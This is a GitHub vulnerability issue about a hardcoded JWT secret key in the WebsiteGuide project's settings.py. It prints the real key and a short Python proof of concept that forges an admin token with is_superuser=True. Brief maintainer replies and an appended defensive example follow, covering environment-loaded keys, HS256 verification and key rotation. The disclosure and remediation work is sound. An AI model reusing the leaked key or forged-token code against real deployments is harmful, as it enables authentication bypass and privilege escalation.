
[Vulnerability] Hardcoded JWT Secret Key in settings.py Leads to Authentication Bypass

Open Tritium0041 opened this issue 7 months ago • 2 comments

Vulnerable File

WebsiteGuide/settings.py (Line 23)

SECRET_KEY = 'm0r4*w5&)vm9b$rj4r-*-+b+!k^f^c=-vt^)+6m_-^qrg871^x'

Vulnerability Type

Hardcoded Cryptographic Key

Impact

Attackers can:

- Forge JWT tokens with arbitrary user privileges (e.g., is_superuser=True).
- Bypass authentication to access restricted endpoints or administrative functionality.
- Impersonate users (e.g., escalate privileges to admin).

Proof of Concept (POC)

import jwt
import time

# Hardcoded secret key extracted from settings.py
secret = "m0r4*w5&)vm9b$rj4r-*-+b+!k^f^c=-vt^)+6m_-^qrg871^x"

# Malicious payload with elevated privileges
payload = {
    "user_id": 1,
    "username": "admin",
    "exp": time.time() + 14400,  # Token valid for 4 hours
    "email": "null",
    "is_superuser": True  # Privilege escalation
}

# Generate forged JWT token
forged_token = jwt.encode(payload, secret, algorithm='HS256')
print(f"Forged JWT Token: {forged_token}")

Visit the API with the generated token:

[image]

This is considered a proof of authentication bypass.

Tritium0041, May 28 '25 03:05

It is recommended to regenerate the key and not disclose it.

mizhexiaoxiao, May 28 '25 03:05

So why not generate it randomly at the start of the web server?

Tritium0041, May 28 '25 03:05
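The defensive side of the remediation discussed in the report and the two replies, as an added example that is not code from the issue or from the WebsiteGuide project. It loads SECRET_KEY from the environment and refuses to boot with a default, includes an opt-in "generate at startup" path so the trade-off raised in the last comment can be seen, and uses a small stdlib-only HS256 verifier (an assumption standing in for PyJWT or the project's own auth code) that pins the algorithm and checks expiry. The rotation check shows that a token minted under a constructed stand-in for the leaked key stops validating once the key is replaced. All function names and key values are hypothetical.

```python
import base64
import hashlib
import hmac
import json
import os
import secrets
import time

# Constructed stand-in for a leaked key; not the value from the report.
OLD_LEAKED_KEY = "CONSTRUCTED-old-leaked-key"


def load_secret_key(env=None, allow_ephemeral=False):
    """Resolve SECRET_KEY from the environment instead of a literal in settings.py.

    allow_ephemeral=True mirrors the "generate it at startup" idea from the thread.
    Caveat: every restart, and every worker in a multi-process deployment, gets a
    different key, so all previously issued tokens stop validating. For production,
    provision the key externally and rotate it deliberately.
    """
    env = os.environ if env is None else env
    key = env.get("SECRET_KEY")
    if key:
        return key
    if allow_ephemeral:
        return secrets.token_urlsafe(50)
    raise RuntimeError("SECRET_KEY is not set; refusing to start with a default key")


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _hs256(secret, signing_input):
    return hmac.new(secret.encode(), signing_input.encode("ascii"), hashlib.sha256).digest()


def sign_hs256(secret, claims):
    """Issue a compact JWT (header.payload.signature) with an HMAC-SHA256 signature."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}"
    return f"{signing_input}.{_b64url(_hs256(secret, signing_input))}"


def verify_hs256(secret, token, now=None):
    """Return the claims if alg, signature and expiry all check out, otherwise None."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        # Pin the algorithm: a token claiming alg=none or any other alg is rejected.
        if header.get("alg") != "HS256":
            return None
        expected = _hs256(secret, f"{header_b64}.{body_b64}")
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        claims = json.loads(_b64url_decode(body_b64))
    except ValueError:  # wrong segment count, bad base64 or bad JSON
        return None
    now = time.time() if now is None else now
    if not isinstance(claims.get("exp"), (int, float)) or claims["exp"] <= now:
        return None
    return claims


def rotation_demo(now=1_700_000_000):
    """Show that rotating the key invalidates tokens minted under the leaked one."""
    new_key = secrets.token_urlsafe(50)
    stale = sign_hs256(OLD_LEAKED_KEY, {"user_id": 1, "is_superuser": True, "exp": now + 14400})
    fresh = sign_hs256(new_key, {"user_id": 1, "exp": now + 14400})
    return {
        "stale_before_rotation": verify_hs256(OLD_LEAKED_KEY, stale, now) is not None,
        "stale_after_rotation": verify_hs256(new_key, stale, now) is not None,
        "fresh_after_rotation": verify_hs256(new_key, fresh, now) is not None,
    }


if __name__ == "__main__":
    print(rotation_demo())
```

Rotation alone is enough to cut off tokens signed with the old key, but the whole point of the report is that the value in the repository history is still readable, so the replacement must live outside the codebase (environment, secret manager) and the old one should be treated as compromised. The `allow_ephemeral` path makes the cost of the "generate at startup" suggestion explicit: it is convenient for a single dev process and disruptive for anything restarted or scaled out.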